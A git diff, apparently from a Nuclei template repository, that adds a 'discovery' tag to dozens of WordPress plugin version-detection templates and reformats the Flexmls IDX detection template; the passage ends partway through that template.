05f63c88f62..bf3c7b45dce 100644 --- a/http/technologies/wordpress/plugins/autoptimize.yaml +++ b/http/technologies/wordpress/plugins/autoptimize.yaml @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: autoptimize wpscan: https://wpscan.com/plugin/autoptimize - tags: tech,wordpress,wp-plugin,top-100,top-200 + tags: tech,wordpress,wp-plugin,top-100,top-200,discovery http: - method: GET diff --git a/http/technologies/wordpress/plugins/backuply.yaml b/http/technologies/wordpress/plugins/backuply.yaml index 48ebf743f48..c94a7e50673 100644 --- a/http/technologies/wordpress/plugins/backuply.yaml +++ b/http/technologies/wordpress/plugins/backuply.yaml @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: backuply wpscan: https://wpscan.com/plugin/backuply - tags: tech,wordpress,wp-plugin,top-200 + tags: tech,wordpress,wp-plugin,top-200,discovery http: - method: GET diff --git a/http/technologies/wordpress/plugins/backwpup.yaml b/http/technologies/wordpress/plugins/backwpup.yaml index 494dc675912..adc1aa761af 100644 --- a/http/technologies/wordpress/plugins/backwpup.yaml +++ b/http/technologies/wordpress/plugins/backwpup.yaml @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: backwpup wpscan: https://wpscan.com/plugin/backwpup - tags: tech,wordpress,wp-plugin,top-200 + tags: tech,wordpress,wp-plugin,top-200,discovery http: - method: GET diff --git a/http/technologies/wordpress/plugins/better-search-replace.yaml b/http/technologies/wordpress/plugins/better-search-replace.yaml index 340c268ede5..f1c7972bb2a 100644 --- a/http/technologies/wordpress/plugins/better-search-replace.yaml +++ b/http/technologies/wordpress/plugins/better-search-replace.yaml @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: better-search-replace wpscan: https://wpscan.com/plugin/better-search-replace - tags: tech,wordpress,wp-plugin,top-100,top-200 + tags: tech,wordpress,wp-plugin,top-100,top-200,discovery http: - method: GET diff --git a/http/technologies/wordpress/plugins/better-wp-security.yaml b/http/technologies/wordpress/plugins/better-wp-security.yaml index e65b7606480..772b137f335 100644 --- a/http/technologies/wordpress/plugins/better-wp-security.yaml +++ b/http/technologies/wordpress/plugins/better-wp-security.yaml @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: better-wp-security wpscan: https://wpscan.com/plugin/better-wp-security - tags: tech,wordpress,wp-plugin,top-100,top-200 + tags: tech,wordpress,wp-plugin,top-100,top-200,discovery http: - method: GET diff --git a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml index bb7f9068752..e5c83b6b114 100644 --- a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml +++ b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: black-studio-tinymce-widget wpscan: https://wpscan.com/plugin/black-studio-tinymce-widget - tags: tech,wordpress,wp-plugin,top-200 + tags: tech,wordpress,wp-plugin,top-200,discovery http: - method: GET diff --git a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml index a412e414904..21abf0d2e1f 100644 --- a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml +++ b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: breadcrumb-navxt wpscan: https://wpscan.com/plugin/breadcrumb-navxt - tags: tech,wordpress,wp-plugin,top-100,top-200 + tags: tech,wordpress,wp-plugin,top-100,top-200,discovery http: - method: GET diff --git a/http/technologies/wordpress/plugins/breeze.yaml b/http/technologies/wordpress/plugins/breeze.yaml index 0e83dd7bdda..65293f22a50 100644 --- a/http/technologies/wordpress/plugins/breeze.yaml +++ b/http/technologies/wordpress/plugins/breeze.yaml @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: breeze wpscan: https://wpscan.com/plugin/breeze - tags: tech,wordpress,wp-plugin,top-200 + tags: tech,wordpress,wp-plugin,top-200,discovery http: - method: GET diff --git a/http/technologies/wordpress/plugins/broken-link-checker.yaml b/http/technologies/wordpress/plugins/broken-link-checker.yaml index c80d5eb6f50..9eb0875c6f7 100644 --- a/http/technologies/wordpress/plugins/broken-link-checker.yaml +++ b/http/technologies/wordpress/plugins/broken-link-checker.yaml @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: broken-link-checker wpscan: https://wpscan.com/plugin/broken-link-checker - tags: tech,wordpress,wp-plugin,top-200 + tags: tech,wordpress,wp-plugin,top-200,discovery http: - method: GET diff --git a/http/technologies/wordpress/plugins/burst-statistics.yaml b/http/technologies/wordpress/plugins/burst-statistics.yaml index 4a0135097b2..d374f16c931 100644 --- a/http/technologies/wordpress/plugins/burst-statistics.yaml +++ b/http/technologies/wordpress/plugins/burst-statistics.yaml @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: burst-statistics wpscan: https://wpscan.com/plugin/burst-statistics - tags: tech,wordpress,wp-plugin,top-200 + tags: tech,wordpress,wp-plugin,top-200,discovery http: - method: GET diff --git a/http/technologies/wordpress/plugins/chaty.yaml b/http/technologies/wordpress/plugins/chaty.yaml index 58e6047a2f0..4c3814e7a63 100644 --- a/http/technologies/wordpress/plugins/chaty.yaml +++ b/http/technologies/wordpress/plugins/chaty.yaml @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: chaty wpscan: https://wpscan.com/plugin/chaty - tags: tech,wordpress,wp-plugin,top-200 + tags: tech,wordpress,wp-plugin,top-200,discovery http: - method: GET diff --git a/http/technologies/wordpress/plugins/child-theme-configurator.yaml b/http/technologies/wordpress/plugins/child-theme-configurator.yaml index f30ebf2b74c..3f979f12c5a 100644 --- a/http/technologies/wordpress/plugins/child-theme-configurator.yaml +++ b/http/technologies/wordpress/plugins/child-theme-configurator.yaml @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: child-theme-configurator wpscan: https://wpscan.com/plugin/child-theme-configurator - tags: tech,wordpress,wp-plugin,top-200 + tags: tech,wordpress,wp-plugin,top-200,discovery http: - method: GET diff --git a/http/technologies/wordpress/plugins/classic-editor.yaml b/http/technologies/wordpress/plugins/classic-editor.yaml index ff4af5fd8cd..76f2d29d93a 100644 --- a/http/technologies/wordpress/plugins/classic-editor.yaml +++ b/http/technologies/wordpress/plugins/classic-editor.yaml @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: classic-editor wpscan: https://wpscan.com/plugin/classic-editor - tags: tech,wordpress,wp-plugin,top-100,top-200 + tags: tech,wordpress,wp-plugin,top-100,top-200,discovery http: - method: GET diff --git a/http/technologies/wordpress/plugins/classic-widgets.yaml b/http/technologies/wordpress/plugins/classic-widgets.yaml index 92c46378081..a36cf8198bd 100644 --- a/http/technologies/wordpress/plugins/classic-widgets.yaml +++ b/http/technologies/wordpress/plugins/classic-widgets.yaml @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: classic-widgets wpscan: https://wpscan.com/plugin/classic-widgets - tags: tech,wordpress,wp-plugin,top-100,top-200 + tags: tech,wordpress,wp-plugin,top-100,top-200,discovery http: - method: GET diff --git a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml index b820cfb4fab..1605410a447 100644 --- a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml +++ b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: click-to-chat-for-whatsapp wpscan: https://wpscan.com/plugin/click-to-chat-for-whatsapp - tags: tech,wordpress,wp-plugin,top-100,top-200 + tags: tech,wordpress,wp-plugin,top-100,top-200,discovery http: - method: GET diff --git a/http/technologies/wordpress/plugins/cloudflare.yaml b/http/technologies/wordpress/plugins/cloudflare.yaml index a0fdffab7aa..699a2fed815 100644 --- a/http/technologies/wordpress/plugins/cloudflare.yaml +++ b/http/technologies/wordpress/plugins/cloudflare.yaml @@ -10,7 +10,7 @@ info: max-request: 1 plugin_namespace: cloudflare wpscan: https://wpscan.com/plugin/cloudflare - tags: tech,wordpress,wp-plugin,top-200 + tags: tech,wordpress,wp-plugin,top-200,discovery http: - method: GET diff --git a/http/technologies/wordpress/plugins/cmb2.yaml b/http/technologies/wordpress/plugins/cmb2.yaml index 08189e9b297..801f58a5fbf 100644 --- a/http/technologies/wordpress/plugins/cmb2.yaml +++ b/http/technologies/wordpress/plugins/cmb2.yaml @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: cmb2 wpscan: https://wpscan.com/plugin/cmb2 - tags: tech,wordpress,wp-plugin,top-200 + tags: tech,wordpress,wp-plugin,top-200,discovery http: - method: GET diff --git a/http/technologies/wordpress/plugins/coblocks.yaml b/http/technologies/wordpress/plugins/coblocks.yaml index 660f9ec133c..6c2716b3510 100644 --- a/http/technologies/wordpress/plugins/coblocks.yaml +++ b/http/technologies/wordpress/plugins/coblocks.yaml @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: coblocks wpscan: https://wpscan.com/plugin/coblocks - tags: tech,wordpress,wp-plugin,top-200 + tags: tech,wordpress,wp-plugin,top-200,discovery http: - method: GET diff --git a/http/technologies/wordpress/plugins/code-snippets.yaml b/http/technologies/wordpress/plugins/code-snippets.yaml index 27fb627c45b..7809a600ac7 100644 --- a/http/technologies/wordpress/plugins/code-snippets.yaml +++ b/http/technologies/wordpress/plugins/code-snippets.yaml @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: code-snippets wpscan: https://wpscan.com/plugin/code-snippets - tags: tech,wordpress,wp-plugin,top-100,top-200 + tags: tech,wordpress,wp-plugin,top-100,top-200,discovery http: - method: GET diff --git a/http/technologies/wordpress/plugins/coming-soon.yaml b/http/technologies/wordpress/plugins/coming-soon.yaml index 7679f87997c..fe7095142e6 100644 --- a/http/technologies/wordpress/plugins/coming-soon.yaml +++ b/http/technologies/wordpress/plugins/coming-soon.yaml @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: coming-soon wpscan: https://wpscan.com/plugin/coming-soon - tags: tech,wordpress,wp-plugin,top-100,top-200 + tags: tech,wordpress,wp-plugin,top-100,top-200,discovery http: - method: GET diff --git a/http/technologies/wordpress/plugins/complianz-gdpr.yaml b/http/technologies/wordpress/plugins/complianz-gdpr.yaml index 9807f901096..a123032e649 100644 --- a/http/technologies/wordpress/plugins/complianz-gdpr.yaml +++ b/http/technologies/wordpress/plugins/complianz-gdpr.yaml @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: complianz-gdpr wpscan: https://wpscan.com/plugin/complianz-gdpr - tags: tech,wordpress,wp-plugin,top-100,top-200 + tags: tech,wordpress,wp-plugin,top-100,top-200,discovery http: - method: GET diff --git a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml index 004061bc94c..d856a0c5d18 100644 --- a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: contact-form-7-honeypot wpscan: https://wpscan.com/plugin/contact-form-7-honeypot - tags: tech,wordpress,wp-plugin,top-200 + tags: tech,wordpress,wp-plugin,top-200,discovery http: - method: GET diff --git a/http/technologies/wordpress/plugins/contact-form-7.yaml b/http/technologies/wordpress/plugins/contact-form-7.yaml index 1baeb3ff2f8..23a5319f6d6 100644 --- a/http/technologies/wordpress/plugins/contact-form-7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7.yaml @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: contact-form-7 wpscan: https://wpscan.com/plugin/contact-form-7 - tags: tech,wordpress,wp-plugin,top-100,top-200 + tags: tech,wordpress,wp-plugin,top-100,top-200,discovery http: - method: GET diff --git a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml index 9bec6eaff5d..f0a640a4d5e 100644 --- a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: contact-form-cfdb7 wpscan: https://wpscan.com/plugin/contact-form-cfdb7 - tags: tech,wordpress,wp-plugin,top-200 + tags: tech,wordpress,wp-plugin,top-200,discovery http: - method: GET diff --git a/http/technologies/wordpress/plugins/cookie-law-info.yaml b/http/technologies/wordpress/plugins/cookie-law-info.yaml index 217fa3619b8..837ebedfa6f 100644 --- a/http/technologies/wordpress/plugins/cookie-law-info.yaml +++ b/http/technologies/wordpress/plugins/cookie-law-info.yaml @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: cookie-law-info wpscan: https://wpscan.com/plugin/cookie-law-info - tags: tech,wordpress,wp-plugin,top-100,top-200 + tags: tech,wordpress,wp-plugin,top-100,top-200,discovery http: - method: GET diff --git a/http/technologies/wordpress/plugins/cookie-notice.yaml b/http/technologies/wordpress/plugins/cookie-notice.yaml index 4ffad524e75..cc31c76f9df 100644 --- a/http/technologies/wordpress/plugins/cookie-notice.yaml +++ b/http/technologies/wordpress/plugins/cookie-notice.yaml @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: cookie-notice wpscan: https://wpscan.com/plugin/cookie-notice - tags: tech,wordpress,wp-plugin,top-100,top-200 + tags: tech,wordpress,wp-plugin,top-100,top-200,discovery http: - method: GET diff --git a/http/technologies/wordpress/plugins/copy-delete-posts.yaml b/http/technologies/wordpress/plugins/copy-delete-posts.yaml index acb6692b772..78432867ddb 100644 --- a/http/technologies/wordpress/plugins/copy-delete-posts.yaml +++ b/http/technologies/wordpress/plugins/copy-delete-posts.yaml @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: copy-delete-posts wpscan: https://wpscan.com/plugin/copy-delete-posts - tags: tech,wordpress,wp-plugin,top-200 + tags: tech,wordpress,wp-plugin,top-200,discovery http: - method: GET diff --git a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml index 26d1bc4eff0..42119fb7448 100644 --- a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml +++ b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: creame-whatsapp-me wpscan: https://wpscan.com/plugin/creame-whatsapp-me - tags: tech,wordpress,wp-plugin,top-100,top-200 + tags: tech,wordpress,wp-plugin,top-100,top-200,discovery http: - method: GET diff --git a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml index dfd72342f81..b21c8273766 100644 --- a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml +++ b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: creative-mail-by-constant-contact wpscan: https://wpscan.com/plugin/creative-mail-by-constant-contact - tags: tech,wordpress,wp-plugin,top-200 + tags: tech,wordpress,wp-plugin,top-200,discovery http: - method: GET diff --git a/http/technologies/wordpress/plugins/custom-css-js.yaml b/http/technologies/wordpress/plugins/custom-css-js.yaml index 8cc63e2188c..93bac1b32d3 100644 --- a/http/technologies/wordpress/plugins/custom-css-js.yaml +++ b/http/technologies/wordpress/plugins/custom-css-js.yaml @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: custom-css-js wpscan: https://wpscan.com/plugin/custom-css-js - tags: tech,wordpress,wp-plugin,top-100,top-200 + tags: tech,wordpress,wp-plugin,top-100,top-200,discovery http: - method: GET diff --git a/http/technologies/wordpress/plugins/custom-fonts.yaml b/http/technologies/wordpress/plugins/custom-fonts.yaml index e74efba20c5..f60a696723b 100644 --- a/http/technologies/wordpress/plugins/custom-fonts.yaml +++ b/http/technologies/wordpress/plugins/custom-fonts.yaml @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: custom-fonts wpscan: https://wpscan.com/plugin/custom-fonts - tags: tech,wordpress,wp-plugin,top-200 + tags: tech,wordpress,wp-plugin,top-200,discovery http: - method: GET diff --git a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml index 344331cb2bc..e12b7020712 100644 --- a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml +++ b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: custom-post-type-ui wpscan: https://wpscan.com/plugin/custom-post-type-ui - tags: tech,wordpress,wp-plugin,top-100,top-200 + tags: tech,wordpress,wp-plugin,top-100,top-200,discovery http: - method: GET diff --git a/http/technologies/wordpress/plugins/disable-comments.yaml b/http/technologies/wordpress/plugins/disable-comments.yaml index b1d43e0df2e..dceeaac2552 100644 --- a/http/technologies/wordpress/plugins/disable-comments.yaml +++ b/http/technologies/wordpress/plugins/disable-comments.yaml @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: disable-comments wpscan: https://wpscan.com/plugin/disable-comments - tags: tech,wordpress,wp-plugin,top-100,top-200 + tags: tech,wordpress,wp-plugin,top-100,top-200,discovery http: - method: GET diff --git a/http/technologies/wordpress/plugins/disable-gutenberg.yaml b/http/technologies/wordpress/plugins/disable-gutenberg.yaml index 3cdda3b9103..14ce391a5d4 100644 --- a/http/technologies/wordpress/plugins/disable-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/disable-gutenberg.yaml @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: disable-gutenberg wpscan: https://wpscan.com/plugin/disable-gutenberg - tags: tech,wordpress,wp-plugin,top-200 + tags: tech,wordpress,wp-plugin,top-200,discovery http: - method: GET diff --git a/http/technologies/wordpress/plugins/duplicate-page.yaml b/http/technologies/wordpress/plugins/duplicate-page.yaml index 0140a77c0e3..bbdc188ec92 100644 --- a/http/technologies/wordpress/plugins/duplicate-page.yaml +++ b/http/technologies/wordpress/plugins/duplicate-page.yaml @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: duplicate-page wpscan: https://wpscan.com/plugin/duplicate-page - tags: tech,wordpress,wp-plugin,top-100,top-200 + tags: tech,wordpress,wp-plugin,top-100,top-200,discovery http: - method: GET diff --git a/http/technologies/wordpress/plugins/duplicate-post.yaml b/http/technologies/wordpress/plugins/duplicate-post.yaml index 91c4a086b63..80ee5a05963 100644 --- a/http/technologies/wordpress/plugins/duplicate-post.yaml +++ b/http/technologies/wordpress/plugins/duplicate-post.yaml @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: duplicate-post wpscan: https://wpscan.com/plugin/duplicate-post - tags: tech,wordpress,wp-plugin,top-100,top-200 + tags: tech,wordpress,wp-plugin,top-100,top-200,discovery http: - method: GET diff --git a/http/technologies/wordpress/plugins/duplicator.yaml b/http/technologies/wordpress/plugins/duplicator.yaml index 7b1d3dcd489..e3b38fec958 100644 --- a/http/technologies/wordpress/plugins/duplicator.yaml +++ b/http/technologies/wordpress/plugins/duplicator.yaml @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: duplicator wpscan: https://wpscan.com/plugin/duplicator - tags: tech,wordpress,wp-plugin,top-100,top-200 + tags: tech,wordpress,wp-plugin,top-100,top-200,discovery http: - method: GET diff --git a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml index a04d223e301..db39baf9251 100644 --- a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml +++ b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: duracelltomi-google-tag-manager wpscan: https://wpscan.com/plugin/duracelltomi-google-tag-manager - tags: tech,wordpress,wp-plugin,top-100,top-200 + tags: tech,wordpress,wp-plugin,top-100,top-200,discovery http: - method: GET diff --git a/http/technologies/wordpress/plugins/easy-fancybox.yaml b/http/technologies/wordpress/plugins/easy-fancybox.yaml index 33ee6bdb232..8ccc5cc26bd 100644 --- a/http/technologies/wordpress/plugins/easy-fancybox.yaml +++ b/http/technologies/wordpress/plugins/easy-fancybox.yaml @@ -10,7 +10,7 @@ info: max-request: 1 plugin_namespace: easy-fancybox wpscan: https://wpscan.com/plugin/easy-fancybox - tags: tech,wordpress,wp-plugin,top-200 + tags: tech,wordpress,wp-plugin,top-200,discovery http: - method: GET diff --git a/http/technologies/wordpress/plugins/easy-google-fonts.yaml b/http/technologies/wordpress/plugins/easy-google-fonts.yaml index 72a3c8d003e..99b68912aef 100644 --- a/http/technologies/wordpress/plugins/easy-google-fonts.yaml +++ b/http/technologies/wordpress/plugins/easy-google-fonts.yaml @@ -10,7 +10,7 @@ info: max-request: 1 plugin_namespace: easy-google-fonts wpscan: https://wpscan.com/plugin/easy-google-fonts - tags: tech,wordpress,wp-plugin,top-200 + tags: tech,wordpress,wp-plugin,top-200,discovery http: - method: GET diff --git a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml index f23b353a83c..98e11d764f1 100644 --- a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml +++ b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: easy-table-of-contents wpscan: https://wpscan.com/plugin/easy-table-of-contents - tags: tech,wordpress,wp-plugin,top-200 + tags: tech,wordpress,wp-plugin,top-200,discovery http: - method: GET diff --git a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml index e62f6023250..62c96d2aad1 100644 --- a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml +++ b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: easy-wp-smtp wpscan: https://wpscan.com/plugin/easy-wp-smtp - tags: tech,wordpress,wp-plugin,top-200 + tags: tech,wordpress,wp-plugin,top-200,discovery http: - method: GET diff --git a/http/technologies/wordpress/plugins/elementor.yaml b/http/technologies/wordpress/plugins/elementor.yaml index e6c09368749..1c1ae389eaf 100644 --- a/http/technologies/wordpress/plugins/elementor.yaml +++ b/http/technologies/wordpress/plugins/elementor.yaml @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: elementor wpscan: https://wpscan.com/plugin/elementor - tags: tech,wordpress,wp-plugin,top-100,top-200 + tags: tech,wordpress,wp-plugin,top-100,top-200,discovery http: - method: GET diff --git a/http/technologies/wordpress/plugins/elementskit-lite.yaml b/http/technologies/wordpress/plugins/elementskit-lite.yaml index 744123597d0..c9152fca2dc 100644 --- a/http/technologies/wordpress/plugins/elementskit-lite.yaml +++ b/http/technologies/wordpress/plugins/elementskit-lite.yaml @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: elementskit-lite wpscan: https://wpscan.com/plugin/elementskit-lite - tags: tech,wordpress,wp-plugin,top-100,top-200 + tags: tech,wordpress,wp-plugin,top-100,top-200,discovery http: - method: GET diff --git a/http/technologies/wordpress/plugins/enable-media-replace.yaml b/http/technologies/wordpress/plugins/enable-media-replace.yaml index 0fb17b54a20..a4d2775d595 100644 --- a/http/technologies/wordpress/plugins/enable-media-replace.yaml +++ b/http/technologies/wordpress/plugins/enable-media-replace.yaml @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: enable-media-replace wpscan: https://wpscan.com/plugin/enable-media-replace - tags: tech,wordpress,wp-plugin,top-200 + tags: tech,wordpress,wp-plugin,top-200,discovery http: - method: GET diff --git a/http/technologies/wordpress/plugins/envato-elements.yaml b/http/technologies/wordpress/plugins/envato-elements.yaml index ba30d0c8336..92ef8ff1067 100644 --- a/http/technologies/wordpress/plugins/envato-elements.yaml +++ b/http/technologies/wordpress/plugins/envato-elements.yaml @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: envato-elements wpscan: https://wpscan.com/plugin/envato-elements - tags: tech,wordpress,wp-plugin,top-100,top-200 + tags: tech,wordpress,wp-plugin,top-100,top-200,discovery http: - method: GET diff --git a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml index 23cd8b41d38..4cc70ff0471 100644 --- a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml +++ b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: essential-addons-for-elementor-lite wpscan: https://wpscan.com/plugin/essential-addons-for-elementor-lite - tags: tech,wordpress,wp-plugin,top-100,top-200 + tags: tech,wordpress,wp-plugin,top-100,top-200,discovery http: - method: GET diff --git a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml index 4d26e71894d..a90ad3783e7 100644 --- a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml +++ b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: ewww-image-optimizer wpscan: https://wpscan.com/plugin/ewww-image-optimizer - tags: tech,wordpress,wp-plugin,top-100,top-200 + tags: tech,wordpress,wp-plugin,top-100,top-200,discovery http: - method: GET diff --git a/http/technologies/wordpress/plugins/extendify.yaml b/http/technologies/wordpress/plugins/extendify.yaml index 243b9c53f7d..a5e204997f0 100644 --- a/http/technologies/wordpress/plugins/extendify.yaml +++ b/http/technologies/wordpress/plugins/extendify.yaml @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: extendify wpscan: https://wpscan.com/plugin/extendify - tags: tech,wordpress,wp-plugin,top-200 + tags: tech,wordpress,wp-plugin,top-200,discovery http: - method: GET diff --git a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml index 00a9193ca6b..c9b41415677 100644 --- a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: facebook-for-woocommerce wpscan: https://wpscan.com/plugin/facebook-for-woocommerce - tags: tech,wordpress,wp-plugin,top-200 + tags: tech,wordpress,wp-plugin,top-200,discovery http: - method: GET diff --git a/http/technologies/wordpress/plugins/fast-indexing-api.yaml b/http/technologies/wordpress/plugins/fast-indexing-api.yaml index b5e86fdff56..df001924382 100644 --- a/http/technologies/wordpress/plugins/fast-indexing-api.yaml +++ b/http/technologies/wordpress/plugins/fast-indexing-api.yaml @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: fast-indexing-api wpscan: https://wpscan.com/plugin/fast-indexing-api - tags: tech,wordpress,wp-plugin,top-200 + tags: tech,wordpress,wp-plugin,top-200,discovery http: - method: GET diff --git a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml index f7840fb5a73..fbfa6f4e14b 100644 --- a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml +++ b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: favicon-by-realfavicongenerator wpscan: https://wpscan.com/plugin/favicon-by-realfavicongenerator - tags: tech,wordpress,wp-plugin,top-200 + tags: tech,wordpress,wp-plugin,top-200,discovery http: - method: GET diff --git a/http/technologies/wordpress/plugins/flamingo.yaml b/http/technologies/wordpress/plugins/flamingo.yaml index 4f9d65d0ecd..eeea496fe34 100644 --- a/http/technologies/wordpress/plugins/flamingo.yaml +++ b/http/technologies/wordpress/plugins/flamingo.yaml @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: flamingo wpscan: https://wpscan.com/plugin/flamingo - tags: tech,wordpress,wp-plugin,top-100,top-200 + tags: tech,wordpress,wp-plugin,top-100,top-200,discovery http: - method: GET diff --git a/http/technologies/wordpress/plugins/flexmls-detect.yaml b/http/technologies/wordpress/plugins/flexmls-detect.yaml index 78a028e6490..ff840348869 100644 --- a/http/technologies/wordpress/plugins/flexmls-detect.yaml +++ b/http/technologies/wordpress/plugins/flexmls-detect.yaml @@ -1,48 +1,48 @@ -id: flexmls-idx-detect - -info: - name: Flexmls IDX - Detect - author: rxerium,sorrowx3 - severity: info - metadata: - verified: true - max-request: 1 - shodan-query: html:"/wp-content/plugins/flexmls-idx" - tags: tech,detect,flexmls,idx - -http: - - method: GET - path: - - "{{BaseURL}}/wp-content/plugins/flexmls-idx/readme.txt" - - payloads: - last_version: helpers/wordpress/plugins/flexmls-idx.txt - - extractors: - - type: regex - part: body - internal: true - name: internal_detected_version - group: 1 - regex: - - '(?i)Stable.tag:\s?([\w.]+)' - - - type: regex - part: body - name: detected_version - group: 1 - regex: - - '(?i)Stable.tag:\s?([\w.]+)' - - matchers-condition: or - matchers: - - type: dsl - name: "outdated_version" - dsl: - - compare_versions(internal_detected_version, concat("< ", last_version)) - - - type: regex - part: body - regex: +id: flexmls-idx-detect + +info: + name: Flexmls IDX - Detect + author: rxerium,sorrowx3 + severity: info + metadata: + verified: true + max-request: 1 + shodan-query: html:"/wp-content/plugins/flexmls-idx" + tags: tech,detect,flexmls,idx,discovery + +http: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/flexmls-idx/readme.txt" + + payloads: + last_version: helpers/wordpress/plugins/flexmls-idx.txt + + extractors: + - type: regex + part: body + internal: true + name: internal_detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + - type: regex + part: body + name: detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + matchers-condition: or + matchers: + - type: dsl + name: "outdated_version" + dsl: + - compare_versions(internal_detected_version, concat("< ", last_version)) + + - type: regex + part: body + regex: - 